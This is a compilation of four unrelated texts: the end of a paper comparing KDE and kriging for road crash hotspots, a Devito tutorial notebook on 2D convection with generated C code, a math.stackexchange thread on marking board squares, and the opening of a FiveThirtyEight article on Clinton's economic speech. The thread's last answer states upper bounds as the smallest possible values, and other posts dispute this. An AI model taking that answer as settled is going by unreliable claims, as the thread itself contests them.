computed with respect to the total area of hotspots.
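A minimal sketch (not the authors' code) of Eq. (4) together with the top-decile hotspot selection of Sect. 4.3; the two numeric cases reproduce the 0.5 and 0.31 figures quoted above, and the function names are hypothetical.

```python
import numpy as np

def pai(n_hotspot_crashes, total_crashes, hotspot_extent, total_extent):
    """Eq. (4): percentage of crashes captured by the hotspots divided by the
    percentage of network extent (length or area) that the hotspots cover."""
    return (n_hotspot_crashes / total_crashes) / (hotspot_extent / total_extent)

def top_decile_mask(estimates):
    """Quantile classification into ten risk levels; return a boolean mask for
    level 10 (the top 10 % of cells), taken as the hotspot set."""
    estimates = np.asarray(estimates, dtype=float)
    return estimates >= np.quantile(estimates, 0.9)

# the paper's illustrative cases: 25 % of crashes in 50 % vs 80 % of the area
case_a = pai(25, 100, 50, 100)   # 0.5
case_b = pai(25, 100, 80, 100)   # 0.3125, reported as 0.31
```

Identifying the whole region as hotspots gives `pai(100, 100, 100, 100) = 1`, matching the normalization argument above.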
## 5 Results and discussions

Two different geostatistical techniques, the KDE and kriging methods, were employed for the hotspot analysis. Figure 8 illustrates the estimated results on a temporal basis using the two methods. For the KDE method, two different bandwidths (i.e., 400 and 800 m) were considered to evaluate the sensitivity of the estimation process, but only the results for 400 m are presented here due to limited space. One of the reasons for using 400 m as the minimum spatial unit was to sufficiently cover the size of the predefined grid cell; in other words, a bandwidth smaller than the grid cell would be of little use for the KDE method, because its output would eventually be averaged over each grid cell. Note that in both methods a grid cell size of 400 by 400 m was used. The results presented are categorized into ten levels arranged in increasing order of risk, each representing 10 % coverage of the total buffered area. This classification in a color-coded map provides a clear visualization of where the crash-prone areas are; for example, an increase in the degree of redness indicates higher-risk sections. Such crash risk maps could be of value to engineers and planners in road agencies when planning road safety budgets. In general, both methods showed that the high crash-prone zones are concentrated in the vicinity of the City of Minneapolis. This is intuitive, as a higher level of traffic interaction generates more safety problems. As the highways extend outward from the core urban areas, the risk level decreases. As seen in the figures, this macro-level visualization of safety risk shows little difference between the methods and temporal units. Further close investigation and comparisons were made by selecting a set of hotspots. Criteria for selecting a set of hotspots may vary across studies, as there is no universal rule of selection.
Whatever the method, the main controlling idea is to select a set of sections with higher safety risk. In our study, we used a simple quantile method in which the top risk level from the previously mentioned classes of risk levels was selected. Alternatively, a threshold cutoff approach could be used, in which the estimated value at each location is compared with a critical value, and the locations exceeding the critical value are screened as hotspots. In such cases, cutoff values could be determined from statistics of the estimated crashes over the area, such as the mean and standard deviation. Figure 9 presents the selected hotspot locations (represented by red rectangles) using the KDE and kriging methods. As observed, the spatial locations of the hotspots identified by these two methods are not identical, so it is important to decide which method performs better through a performance evaluation. A common approach is to compare actual values against estimated results. However, unlike in classical statistical modeling (e.g., using NB models), which commonly uses this approach, this is not straightforward with geostatistical techniques. For example, the KDE method estimates the density of crashes, so it is not convenient to evaluate its performance by comparing the output (density) against the corresponding actual (count) values. Most importantly, as we are comparing two methods, a common measure is needed. This was addressed by adopting a performance measure, the PAI, which was initially proposed by Chainey et al. [34]. Table 1 presents a comparison between the two methods in terms of PAI using both the length of highway section and the buffer area coverage. A slight variation in hotspot location is observed among different times of day, suggesting that hotspot locations depend on the time of day.
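The two selection rules described above — the simple quantile method and the mean-plus-standard-deviation cutoff — can be sketched as follows. Both helpers are hypothetical illustrations (not code from the paper), operating on a 2-D array of per-cell estimates:

```python
import numpy as np

def select_hotspots_quantile(density, top_frac=0.10):
    """Simple quantile rule: flag the top `top_frac` of grid cells by
    estimated crash density/frequency, i.e. cells at or above the
    (1 - top_frac) quantile of the estimates."""
    cutoff = np.quantile(density, 1.0 - top_frac)
    return density >= cutoff

def select_hotspots_threshold(density, n_sd=2.0):
    """Threshold cutoff rule: flag cells exceeding the mean plus
    `n_sd` standard deviations of the estimates over the area."""
    return density > density.mean() + n_sd * density.std()

# Example on a synthetic 5 x 5 grid of estimates
rng = np.random.default_rng(0)
d = rng.random((5, 5))
hot = select_hotspots_quantile(d)  # boolean mask of hotspot cells
```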
Comparatively, most of the hotspots are located around intersections and interchanges in both methods; however, the hotspots from the kriging method are somewhat more spread out. In all cases, the kriging method has higher PAI values than the KDE method. As explained in Sect. 4.4, a higher PAI value indicates a better ability to locate high crash potential in a small area, which practically helps road agencies to efficiently mobilize limited resources. On this evidence of the PAI values, the kriging method outperforms KDE; a more definitive conclusion could be reached in future work by comparing against the statistical modeling approach. A similar hotspot pattern was observed with both bandwidths in the KDE method, as presented in Table 1 (only the output map for 400 m is reported). The results obtained from both bandwidths were comparable, showing little sensitivity to the selected values, as shown in Fig. 10.

Table 1 Performance comparisons of KDE and kriging methods

| Time-of-day | No. of crashes in hotspot | Total crashes | Length of highway (km, two way) | Area coverage (km²) | PAI (length) | PAI (area) |
|---|---|---|---|---|---|---|
| **KDE method (bandwidth 400 m)** | | | | | | |
| All crash | 14,239 | 38,748 | 107.04 | 16.32 | 2.75 | 3.69 |
| MP crash | 1,611 | 5,331 | 88.17 | 13.76 | 2.74 | 3.60 |
| EP crash | 2,700 | 7,712 | 82.79 | 13.28 | 3.38 | 4.32 |
| OP crash | 9,376 | 25,705 | 102.27 | 15.68 | 2.85 | 3.81 |
| Total (T) & Avg. (A) | | | 799.67 (T) | 163.96 (T) | 2.93 (A) | 3.86 (A) |
| **KDE method (bandwidth 800 m)** | | | | | | |
| All crash | 12,504 | 38,748 | 94.70 | 15.36 | 2.72 | 3.44 |
| MP crash | 1,175 | 5,331 | 82.89 | 11.84 | 2.13 | 3.05 |
| EP crash | 2,252 | 7,712 | 75.04 | 12.00 | 3.11 | 3.99 |
| OP crash | 8,146 | 25,705 | 89.26 | 14.24 | 2.84 | 3.65 |
| Total (T) & Avg. (A) | | | 799.67 (T) | 163.96 (T) | 2.70 (A) | 3.53 (A) |
| **Kriging method** | | | | | | |
| All crash | 14,839 | 38,748 | 100.62 | 14.88 | 3.04 | 4.22 |
| MP crash | 1,907 | 5,331 | 106.61 | 15.36 | 2.68 | 3.82 |
| EP crash | 3,558 | 7,712 | 108.71 | 16.00 | 3.39 | 4.73 |
| OP crash | 10,886 | 25,705 | 107.17 | 16.64 | 3.16 | 4.17 |
| Total (T) & Avg. (A) | | | 799.67 (T) | 163.96 (T) | 3.07 (A) | 4.23 (A) |

The area coverage is not exactly 10 % due to the loss of some cell sections during GIS processing.

In addition, another bandwidth (i.e., 800 m) was tested to check the sensitivity to the bandwidth choice, but only a small difference was observed in performance. For example, as shown in Table 1, the PAI (length) value for the all-crash case was 2.75 for the 400 m bandwidth, while a comparable value of 2.72 was found for the 800 m bandwidth. The magnitude of the difference is marginal (i.e., 1.09 %). A similar trend was also observed for the other times of day, as presented in Fig. 10. From this, it appears that the PAI index is higher when a smaller bandwidth is used, irrespective of time of day. This also suggests that a further analysis testing the sensitivity of different bandwidth sizes is not necessary for the comparison with the kriging method. Note that the total areas of the selected hotspots are not exactly the same (see Table 1); this small discrepancy arises during GIS data processing. However, this minor discrepancy in total area does not affect the resulting PAI indexes, as they were calculated using normalized figures (refer to Eq. (4)). As outlined previously, the hotspots identified by the two methods were compared by matching their physical locations for all four temporal groups. The intent of this non-performance-oriented comparison is to see whether there is a high (or low) match between the outcomes of the two methods, and to investigate the feasibility of using one approach in place of the other. The matching rates between the outcomes of kriging and KDE with 400 m bandwidth were found to be 52 %, 75 %, 66 %, and 71 % for the All, MP, EP, and OP crash groups, respectively.
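The matching-rate comparison can be expressed compactly in code. The helper below is a sketch under the assumption that the rate is the commonly identified hotspot area divided by the total area flagged by either method (the paper's "total area of hotspots" is not defined precisely):

```python
import numpy as np

def hotspot_match_rate(hot_a, hot_b):
    """Matching rate between two hotspot maps (boolean grids of equal
    shape): cells identified by both methods, relative to the total
    number of cells flagged by either method."""
    common = np.logical_and(hot_a, hot_b).sum()
    total = np.logical_or(hot_a, hot_b).sum()
    return common / total

# Toy example with two 2 x 2 hotspot masks
a = np.array([[True, False], [True, True]])
b = np.array([[True, True], [False, True]])
rate = hotspot_match_rate(a, b)  # 2 common cells out of 4 flagged -> 0.5
```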
This clearly suggests that there are significant discrepancies between the two methods in identifying common hotspots. Similarly, the matching rates using KDE with bandwidth 800 m were 45 %, 77 %, 62 %, and 69 % for the All, MP, EP, and OP crash groups, respectively. Note that the comparison outcomes using the two different bandwidths in the KDE method were comparable. The above findings can be interpreted as follows: first, the average matching rate of 65 % indicates that the outcomes of the two test methods differ significantly, suggesting that one method may not be used as a replacement for the other. Moreover, as the PAI measures indicate that the kriging method performs better than KDE, we may conclude that the kriging method, which is less explored in road safety, could be one of the potential methods for hotspot analysis. However, an open research question arises about which method would produce more accurate results, should the reliability and credibility of the PAI index be questioned. Therefore, further investigation is needed to settle this.

## 6 Conclusions and recommendations

This paper describes a comparative analysis of two geostatistical approaches for estimating the expected collision frequency of individual road sections and identifying crash hotspots in a highway network. In contrast to the widely adopted safety model-based approach, a geostatistical hotspot identification method is less data intensive and easier to implement, as it does not require extensive information about the underlying road network such as road geometry and traffic volume. The two geostatistical methods considered in this analysis are KDE and kriging.
The KDE approach has been applied in a few prior road safety studies, while kriging, one of the least explored methods in road safety studies, was introduced in this research as a promising alternative because of its advantages in handling spatially autocorrelated datasets and its success in other applications. The two methods were compared in a case study identifying crash hotspots in the road network of Hennepin County, Minnesota. Five years of historical crash data, aggregated by different times of day, were used for geostatistically inferring the spatial distribution of the expected crash frequency using the two methods. The estimated crash frequencies were then used for subsequent hotspot identification, and the identification results were compared using two criteria, namely the PAI and the percentage difference in hotspots identified. It was found that, according to the PAI criterion, kriging is superior to KDE in its ability to pinpoint hotspots. A comparison of hotspot rankings indicates that the two methods result in moderately different lists of hotspots. Regardless of the credibility of the evaluation criteria, it is worthwhile to note that kriging, which has seldom been used for road safety analysis, was shown to be a promising technique. The findings suggest that further investigation is required to reach more definite conclusions. This research can be extended in several directions to overcome a few limitations of the study conducted herein. First, further investigation is needed to address how to incorporate the severity of individual crashes in hotspot identification. Second, instead of using the PAI measure, the performance of kriging can be benchmarked against the outcomes of the conventional crash model-based approach.
Third, if we had historical geocoded data for potential crash-influencing factors such as traffic exposure and weather conditions, we could apply the universal kriging method and identify whether these factors make a significant contribution to hotspots. Such weather-related crash studies could be valuable for road agencies, especially in cold countries, for planning proactive winter road maintenance.

## Acknowledgments

The authors wish to acknowledge Jakin Koll and Curt Pape at the Minnesota Department of Transportation for providing the data used in this study. This research was partially funded by the Aurora Program and the Natural Sciences and Engineering Research Council of Canada (NSERC). Open Access: This article is distributed under the terms of the Creative Commons Attribution License, which permits any use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited.

Footnotes: 1. Nearest neighbor distance is the distance from each point event to its nearest neighbor.
https://nbviewer.jupyter.org/github/opesci/devito/blob/master/examples/cfd/01_convection_revisited.ipynb
### Example 1b: Linear convection in 2D, revisited

We will now revisit the first example of this tutorial with an example that is better suited to the numerical scheme used in Devito. As a reminder, the governing equation is:

$$\frac{\partial u}{\partial t}+c\frac{\partial u}{\partial x} + c\frac{\partial u}{\partial y} = 0$$

We then discretized this using forward differences in time and backward differences in space:

$$u_{i,j}^{n+1} = u_{i,j}^n-c \frac{\Delta t}{\Delta x}(u_{i,j}^n-u_{i-1,j}^n)-c \frac{\Delta t}{\Delta y}(u_{i,j}^n-u_{i,j-1}^n)$$

In the previous example, the system was initialised with a hat function. As easy as this example seems, it actually highlights a few limitations of finite differences and related methods:

• The governing equation above contains spatial derivatives ($\frac{\partial u}{\partial x}$ and $\frac{\partial u}{\partial y}$). The hat, with its sharp corners, is discontinuous and therefore non-smooth, meaning that the derivatives do not exist at the corners of the hat. This means that the governing equation has no solution in the strict sense for this problem. Mathematically, this problem can be overcome by introducing weak solutions, which still exist in the presence of discontinuities, as long as the problem is smooth almost everywhere. The Finite Volume (FV), Finite Element (FEM) and related schemes are based on this weak form.
• The finite differences method only works well if finite differences are a good approximation of the derivatives. With the chosen discretisation above, this requires that $\frac{u_{i,j}^n-u_{i-1,j}^n}{\Delta x} \approx \frac{\partial u}{\partial x}$ and $\frac{u_{i,j}^n-u_{i,j-1}^n}{\Delta y} \approx \frac{\partial u}{\partial y}$. This is the case for systems with a smooth solution if $\Delta x$ and $\Delta y$ are sufficiently small. But if the solution is non-smooth, as in this example, then we can't expect much regardless of the grid size.
• First-order methods, such as the backward differences that we have used in this example, are known to create artificial diffusion. Higher-order schemes, such as central differences, avoid this problem. However, in the presence of discontinuities these methods introduce so-called spurious oscillations. These oscillations may even build up (grow infinitely) and cause the computation to diverge.
• Discontinuities can appear by themselves for some equations (such as the Burgers equation that we discuss next), even if the initial condition is smooth. In CFD, discontinuities appear for example as shocks in the simulation of transonic flow.

For this reason, numerical schemes that behave well in the presence of discontinuities have been a research subject for a long time. A thorough discussion is beyond the scope of this tutorial, but can be found in [R. LeVeque (1992): Numerical Methods for Conservation Laws, 2nd ed., Birkhäuser Verlag, pp. 8-13]. In the remainder of this example, we will reproduce the results from the previous example, only this time with a smooth initial condition. This lets us observe Devito in a setting for which it is better equipped.

In [1]:

```python
from examples.cfd import plot_field, init_hat, init_smooth
import numpy as np
%matplotlib inline

# Some variable declarations
nx = 81
ny = 81
nt = 100
c = 1.
dx = 2. / (nx - 1)
dy = 2. / (ny - 1)
sigma = .2
dt = sigma * dx
```

Let us now initialise the field with an infinitely smooth bump, as given by [J.A. Krakos (2012): Unsteady Adjoint Analysis for Output Sensitivity and Mesh Adaptation, PhD thesis, p. 68] as

$$f(r)= \begin{cases} \frac{1}{A}e^{-1/(r-r^2)} &\text{ for } 0 < r < 1,\\ 0 &\text{ else,} \end{cases}$$

We use this with $A=100$, and define the initial condition in two dimensions as

$$u^0(x,y)=1+f\left(\frac{2}{3}x\right)f\left(\frac{2}{3}y\right).$$

In [2]:

```python
#NBVAL_IGNORE_OUTPUT
u = np.empty((nx, ny))
init_smooth(field=u, dx=dx, dy=dy)

# Plot initial condition
plot_field(u, zmax=4)
```

Solving this will move the bump again.

In [3]:

```python
# Repeat initialisation, so we can re-run the cell
init_smooth(field=u, dx=dx, dy=dy)

for n in range(nt + 1):
    # Copy previous result into a new buffer
    un = u.copy()
    # Update the new result with a 3-point stencil
    u[1:, 1:] = (un[1:, 1:] - (c * dt / dx * (un[1:, 1:] - un[1:, :-1])) -
                 (c * dt / dy * (un[1:, 1:] - un[:-1, 1:])))
    # Apply boundary conditions
    u[0, :] = 1.
    u[-1, :] = 1.
    u[:, 0] = 1.
    u[:, -1] = 1.
```

In [4]:

```python
#NBVAL_IGNORE_OUTPUT
# A small sanity check for auto-testing
assert (u[45:55, 45:55] > 1.8).all()
u_ref = u.copy()

plot_field(u, zmax=4.)
```

Hooray, the wave moved! It looks like the solver works much better for this example: the wave has not noticeably changed its shape.

#### Devito implementation

Again, we can re-create this via a Devito operator. Let's fill the initial buffer with smooth data and look at it:

In [5]:

```python
#NBVAL_IGNORE_OUTPUT
from devito import Grid, TimeFunction

grid = Grid(shape=(nx, ny), extent=(2., 2.))
u = TimeFunction(name='u', grid=grid)
init_smooth(field=u.data[0], dx=dx, dy=dy)

plot_field(u.data[0])
```

We create again the discretised equation as shown below. Note that the equation is still the same; only the initial condition has changed.

In [6]:

```python
from devito import Eq

eq = Eq(u.dt + c*u.dxl + c*u.dyl)
print(eq)
```

```
Eq(1.0*u(t, x, y)/h_y - 1.0*u(t, x, y - h_y)/h_y + 1.0*u(t, x, y)/h_x - 1.0*u(t, x - h_x, y)/h_x - u(t, x, y)/dt + u(t + dt, x, y)/dt, 0)
```

SymPy can re-organise this equation just like in the previous example.
In [7]:

```python
from devito import solve

stencil = solve(eq, u.forward)
print(stencil)
```

```
-1.0*dt*u(t, x, y)/h_y + 1.0*dt*u(t, x, y - h_y)/h_y - 1.0*dt*u(t, x, y)/h_x + 1.0*dt*u(t, x - h_x, y)/h_x + u(t, x, y)
```

We can now use this stencil expression to create an operator to apply to our data object:

In [8]:

```python
#NBVAL_IGNORE_OUTPUT
from devito import Operator

# Reset our initial condition in both buffers.
# This is required to avoid 0s propagating into
# our solution, which has a background value of 1.
init_smooth(field=u.data[0], dx=dx, dy=dy)
init_smooth(field=u.data[1], dx=dx, dy=dy)

# Apply boundary conditions
u.data[:, 0, :] = 1.
u.data[:, -1, :] = 1.
u.data[:, :, 0] = 1.
u.data[:, :, -1] = 1.

# Create an Operator that updates the forward stencil
# point in the interior subdomain only.
op = Operator(Eq(u.forward, stencil, subdomain=grid.interior))

# Apply the operator for a number of timesteps
op(time=nt, dt=dt)
plot_field(u.data[0, :, :])

# Some small sanity checks for the testing framework
assert (u.data[0, 45:55, 45:55] > 1.8).all()
assert np.allclose(u.data[0], u_ref, rtol=3.e-2)
```

```
Operator Kernel run in 0.00 s
```

Again, this looks just like the result from NumPy. Since this example is just like the one before, the low-level treatment of boundaries is also unchanged.

In [9]:

```python
#NBVAL_IGNORE_OUTPUT
# Reset our data field and ICs in both buffers
init_smooth(field=u.data[0], dx=dx, dy=dy)
init_smooth(field=u.data[1], dx=dx, dy=dy)

# For defining BCs, we generally need to explicitly set rows/columns
# in our field using an expression. We can use Devito's "indexed"
# notation to do this:
x, y = grid.dimensions
t = grid.stepping_dim
bc_left = Eq(u[t + 1, 0, y], 1.)
bc_right = Eq(u[t + 1, nx-1, y], 1.)
bc_top = Eq(u[t + 1, x, ny-1], 1.)
bc_bottom = Eq(u[t + 1, x, 0], 1.)

# Now combine the BC expressions with the stencil to form operator
expressions = [Eq(u.forward, stencil, subdomain=grid.interior)]
expressions += [bc_left, bc_right, bc_top, bc_bottom]
op = Operator(expressions=expressions, dle=None, dse=None)  # <-- Turn off performance optimisations
op(time=nt, dt=dt)
plot_field(u.data[0, :, :])

# Some small sanity checks for the testing framework
assert (u.data[0, 45:55, 45:55] > 1.8).all()
assert np.allclose(u.data[0], u_ref, rtol=3.e-2)
```

```
Operator Kernel run in 0.00 s
```

The C code of the Kernel is also still the same.

In [10]:

```python
print(op.ccode)
```

```c
#define _POSIX_C_SOURCE 200809L
#include "stdlib.h"
#include "math.h"
#include "sys/time.h"

struct dataobj
{
  void *restrict data;
  int * size;
  int * npsize;
  int * dsize;
  int * hsize;
  int * hofs;
  int * oofs;
};

struct profiler
{
  double section0;
  double section1;
  double section2;
};

int Kernel(const float dt, const float h_x, const float h_y,
           struct dataobj *restrict u_vec, const int time_M, const int time_m,
           struct profiler * timers, const int x_M, const int x_m,
           const int xi_ltkn, const int xi_rtkn, const int y_M, const int y_m,
           const int yi_ltkn, const int yi_rtkn)
{
  float (*restrict u)[u_vec->size[1]][u_vec->size[2]] __attribute__ ((aligned (64))) =
    (float (*)[u_vec->size[1]][u_vec->size[2]]) u_vec->data;
  for (int time = time_m, t0 = (time)%(2), t1 = (time + 1)%(2);
       time <= time_M;
       time += 1, t0 = (time)%(2), t1 = (time + 1)%(2))
  {
    struct timeval start_section0, end_section0;
    gettimeofday(&start_section0, NULL);
    for (int xi = x_m + xi_ltkn; xi <= x_M - xi_rtkn; xi += 1)
    {
      for (int yi = y_m + yi_ltkn; yi <= y_M - yi_rtkn; yi += 1)
      {
        u[t1][xi + 1][yi + 1] = 1.0F*dt*u[t0][xi + 1][yi]/h_y - 1.0F*dt*u[t0][xi + 1][yi + 1]/h_y + 1.0F*dt*u[t0][xi][yi + 1]/h_x - 1.0F*dt*u[t0][xi + 1][yi + 1]/h_x + u[t0][xi + 1][yi + 1];
      }
    }
    gettimeofday(&end_section0, NULL);
    timers->section0 += (double)(end_section0.tv_sec-start_section0.tv_sec)+(double)(end_section0.tv_usec-start_section0.tv_usec)/1000000;
    struct timeval start_section1, end_section1;
    gettimeofday(&start_section1, NULL);
    for (int y = y_m; y <= y_M; y += 1)
    {
      u[t1][1][y + 1] = 1.00000000000000F;
      u[t1][81][y + 1] = 1.00000000000000F;
    }
    gettimeofday(&end_section1, NULL);
    timers->section1 += (double)(end_section1.tv_sec-start_section1.tv_sec)+(double)(end_section1.tv_usec-start_section1.tv_usec)/1000000;
    struct timeval start_section2, end_section2;
    gettimeofday(&start_section2, NULL);
    for (int x = x_m; x <= x_M; x += 1)
    {
      u[t1][x + 1][81] = 1.00000000000000F;
      u[t1][x + 1][1] = 1.00000000000000F;
    }
    gettimeofday(&end_section2, NULL);
    timers->section2 += (double)(end_section2.tv_sec-start_section2.tv_sec)+(double)(end_section2.tv_usec-start_section2.tv_usec)/1000000;
  }
  return 0;
}
```
https://math.stackexchange.com/questions/1760579/minimum-number-of-marked-squares-on-n-%C3%97-n-board
# Minimum number of marked squares on $n × n$ board

Came across this question:

Consider an $n × n$ square board, where $n$ is a fixed even positive integer. The board is divided into $n^2$ unit squares. We say that two different squares on the board are adjacent if they have a common side. $N$ unit squares on the board are marked in such a way that every square (marked or unmarked) on the board is adjacent to at least one marked square. Determine the smallest possible value of $N$.

I've found an upper bound of $N = \frac {n^2}2$. But is this the smallest possible value of $N$? If so, how can I prove it? I've included an illustration of my upper bound for $n=2$ and $n=4$ below.

Edit: @jwsiegel has linked to the supposed solution here: http://www.cs.cornell.edu/~asdas/imo/imo/isoln/isoln993.html

It gives the solution $$N = \frac{n(n+2)}{4}$$

I don't understand how this solution is correct. The instructions for marking squares are given as:

1. Color alternate squares black and white (like a chess board).
2. Look first at the odd-length white diagonals. In every other such diagonal, mark alternate squares (starting from the border each time, so that r+1 squares are marked in a diagonal of length 2r+1).

That's it. I have followed these instructions (as I understand them) for $n=4$ and $n=6$ below, using an X to indicate a marked square:

The number of marked squares fits the given solution, i.e. $N = 6$ for $n = 4$ and $N = 12$ for $n = 6$, but NO marked square is adjacent to any other marked square! How then is this a valid solution? I can only see 3 possibilities:

1. I have marked incorrectly, or
2. The people who made this solution count a common corner as a common side between 2 squares, or
3. The solution is incorrect.

• You are on to something! I can delete the first square, but not the third as that would leave the second square not adjacent to a marked square. But I can delete the fourth square.
– Jens Apr 27, 2016 at 4:31 • The paper cited above would apply to the problem if we didn't require the marked squares to be adjacent to another marked square. Apr 27, 2016 at 4:41 • Aren't all squares self adjacent? So aren't marked squares vacuously adjacent to a marked square? Apr 27, 2016 at 4:46 • @ Juan Sebastian Lozano - The definition of "adjacent" only refers to "two different squares". – Jens Apr 27, 2016 at 4:49 • Oh, I see. That makes this problem harder, then. Apr 27, 2016 at 4:50 Consider an infinite checkerboard with squares labelled by pairs of integers and mark every square whose indices satisfy $$(i,j) \equiv (0,0) \pmod{4}$$ $$(i,j) \equiv (0,1) \pmod{4}$$ $$(i,j) \equiv (2,2) \pmod{4}$$ $$(i,j) \equiv (2,3) \pmod{4}$$ This provides a marking of the infinite board with the desired property such that every fourth square is marked. Thus we have that $$\lim_{n\rightarrow \infty} \frac{N}{n^2} = \frac{1}{4}$$ which is clearly the best possible asymptotic result. In fact the value of N is n(n+2)/4. The full solution can be found here. http://www.cs.cornell.edu/~asdas/imo/imo/isoln/isoln993.html • Does this work on an arbitrary finite board? I tried it on a $4n+1 \times 4n+1$ board and it didn't work, but maybe I tried it wrong. Apr 27, 2016 at 5:52 • I think any finite board will require some extra marked square around the boundary. It'll be O(n) additional squares, though. I'd be interested to know if there is a nice closed form expression for $N$. Apr 27, 2016 at 6:25 • I think there should be one for each case mod 4 (just like my answer below), but I don't know about generally. Apr 27, 2016 at 6:42 • Interesting! The question wasn't looking for an asymptotic result though, and I'm troubled by the fact that none of the boards marked using your marking scheme actually work, except for $n = 2$. How can you take a marking scheme which doesn't work for all $n$ and find a legitimate limit? 
– Jens Apr 27, 2016 at 17:02 • @Jens The problem portion of the board with this layout is the border, which consists of $4(n-1)$ squares. When $n$ is large, this number of squares is tiny relative to the total of $n^2$ squares. That's why, in the limit, you obtain the optimal result that one can cover the board by marking at most "just over" a quarter of the squares. Apr 27, 2016 at 19:49

jwsiegel has already provided both an asymptotic answer to the original question, and a link to a closed-form solution. I will address Juan's question in the comments on jwsiegel's answer and Jens's follow-up question in the original post. In answer to Juan's question, "For even n, this is better, but does this work if n is odd?": Nothing in jwsiegel's asymptotic result makes any assumption on the parity of $n$. His answer provides a covering of the infinite plane which satisfies the rules given in the original post. When this marking is restricted to an $n \times n$ board, you get a marking of the board in which every interior square is adjacent to a marked square, with roughly a fourth of the squares marked (exactly 1/4 if $n$ is a multiple of 4). To then cover the boundary as well, you need to add no more than $4(n-1)$ additional squares. When $n$ approaches infinity, this contribution becomes negligible, so we get that, for $n$ large, his covering of the board requires about a quarter of the squares to be marked. Since each square is adjacent to at most 4 other squares, it follows that this result is asymptotically optimal. It is, in principle, possible to precisely calculate how many squares are marked by this procedure, but there is no reason to expect that it will be optimal for any fixed $n$. What the asymptotic solution does do is provide guidance for what a closed-form solution must satisfy, namely, that $$\lim_{n \to \infty} \frac{N}{n^2} = \frac{1}{4}.$$ Now, for OP's question. You forgot this part: "In every other such diagonal..."
With that in mind, here are the cases you wrote up, corrected. Let the upper-left hand corner be white, as in your pictures. I've indicated the black squares using an ascii box; hopefully that should make it pretty clear.

$n=4$:

```
 X | ■ |   | ■
---------------
 ■ |   | ■ | X
---------------
   | ■ |   | ■
---------------
 ■ | X | ■ |
```

$n=6$:

```
 X | ■ |   | ■ | X | ■
-----------------------
 ■ |   | ■ |   | ■ |
-----------------------
   | ■ | X | ■ |   | ■
-----------------------
 ■ |   | ■ |   | ■ | X
-----------------------
 X | ■ |   | ■ |   | ■
-----------------------
 ■ |   | ■ | X | ■ |
```

Observe that every black square is adjacent to exactly one marked white square. Now, as you observed, of course, no white square is adjacent to any marked square. But if we apply the exact same procedure to mark the black squares, then we obtain a marking of the entire board such that every square is adjacent to exactly one marked square. Then the claims are that (1) this board has $n(n+2)/4$ marked squares, and (2) this number of marked squares is optimal.

• Note that this closed form solution absolutely does depend on assuming that $n$ is even. – Jens May 1, 2016 at 23:26
• Glad to have helped! :) May 2, 2016 at 0:51

You can produce upper bounds for the three cases $n \equiv 0, 1, 2 \pmod{3}$. In a $3n \times 3n$ square the upper bound is $3n^2$ because you can color every third row. In the case that it is a $(3n+1) \times (3n+1)$ square, the upper bound is $3n^2+ n + 2\lceil \frac{3n + 1}{4} \rceil$. This results from coloring every third row and adding a pair every two uncolored spaces on the last row. If it is a $(3n+2) \times (3n+2)$ board, the upper bound is $(3n+2)(n+1)$. This is what results from coloring every third row and the last row. All of these cases have the asymptotic ratio of colored squares to total squares of $\frac{1}{3}$, but also work on any finite board with a slightly higher ratio.

• Nice!
I'm trying to test if your numbers work but I'm having a little difficulty because you seem to have overlooked that $n$ must be even. Could you tell me what $N$ you get for $n = 10$? I can't find a solution less than 36. I think the equation of yours I should use here is the one with $(3n + 1)$ in it, giving 34. Correct? – Jens Apr 27, 2016 at 17:32 • That is true, I used general $n$. I fixed my bound on that case, it was incorrect because I made a wrong assumption about how I could divide up the last row. Apr 27, 2016 at 19:04 • Thanks! Would you mind spelling out the final answer (which I think you have found) so even I can immediately understand it? I.e. "Given n (a positive even integer), the smallest possible value of N divides into 3 cases as follows: (1) n mod 3 = 0; blah, blah (2) n mod 3 = 1; blah, blah (3) n mod 3 = 2: blah, blah ". If you post it as new Answer I will immediately upvote it (as I did your answer above). Thanks! – Jens Apr 27, 2016 at 20:40 • To downvoters: notice that these are upper bounds, I'm not claiming these are the best bounds. The best bound has already been produced, actually, and I would accept that answer instead. May 1, 2016 at 10:08 • Fair enough. It seems I'm not allowed to remove my downvote unless you edit this post, for some reason. If I had the option, I would remove this downvote, but not the one on your other answer, because there you do claim this value of $N$ is optimal. May 1, 2016 at 20:19 Given a square of size $n \times n$, where $n \in \mathbb{Z^+}$, the smallest value of shaded squares $N$ can be determined as one of these three cases: 1. If $n \equiv 3k \equiv 0 \mod 3$, then $N = 3k^2$ 2. If $n \equiv 3k +1 \equiv 1 \mod 3$, then $N= 3k^2 + k + 2*\lfloor\frac{3k+1}{4}\rfloor$ 3. If $n \equiv 3k +2 \equiv 2 \mod 3$, then $N= (3k+2)(k+1)$
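The closed form $N = n(n+2)/4$ from the linked solution can be sanity-checked by exhaustive search for small even boards. The helper below is a hypothetical illustration (not from any of the answers above), feasible only for tiny $n$:

```python
from itertools import combinations, product

def min_marked(n):
    """Brute-force the smallest number of marked squares on an n x n
    board such that every square is adjacent (shares a side; a square
    is not adjacent to itself) to at least one marked square."""
    cells = list(product(range(n), repeat=2))

    def neighbors(i, j):
        return [(i + di, j + dj)
                for di, dj in ((1, 0), (-1, 0), (0, 1), (0, -1))
                if 0 <= i + di < n and 0 <= j + dj < n]

    for k in range(1, n * n + 1):
        for marked in map(set, combinations(cells, k)):
            if all(any(nb in marked for nb in neighbors(i, j))
                   for (i, j) in cells):
                return k

# Agrees with N = n(n+2)/4 on the small even boards we can search
assert min_marked(2) == 2 * (2 + 2) // 4  # 2
assert min_marked(4) == 4 * (4 + 2) // 4  # 6
```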
http://fivethirtyeight.com/features/the-numbers-behind-hillary-clintons-economic-vision/
The Numbers Behind Hillary Clinton’s Economic Vision There was a single thread running through Hillary Clinton’s big economics speech on Monday: the importance of raising wages for working Americans. That’s no coincidence: The six-year-old economic recovery has succeeded in restoring corporate profits and creating jobs, but it hasn’t brought pay raises for many workers. Wage growth is running ahead of inflation, but it remains low and hasn’t accelerated as the economy as a whole has improved. And as Clinton stressed throughout her speech, many of those problems predate the recession, suggesting deeper structural challenges in the U.S. economy. “The defining economic challenge of our time is clear,” Clinton said in a speech at New York City’s New School. “We must raise incomes for hard-working Americans, so they can afford a middle-class life. We must drive steady income growth that lifts up families, and lifts up our country.” Clinton’s speech was light on specific proposals — those will arrive in coming weeks, according to her campaign — but it nonetheless represented one of the most comprehensive economic policy visions articulated to date by any of the major presidential candidates. Many of Clinton’s themes will sound familiar to anyone who’s been listening to President Obama over the past eight years. She wants to boost incomes for the middle class, raise taxes on the wealthy and make it easier for parents to juggle work and family. But she also highlighted issues that haven’t been as central to Obama’s message, such as encouraging companies to share more of their profits with workers. Clinton wasn’t shy about criticizing leading Republican 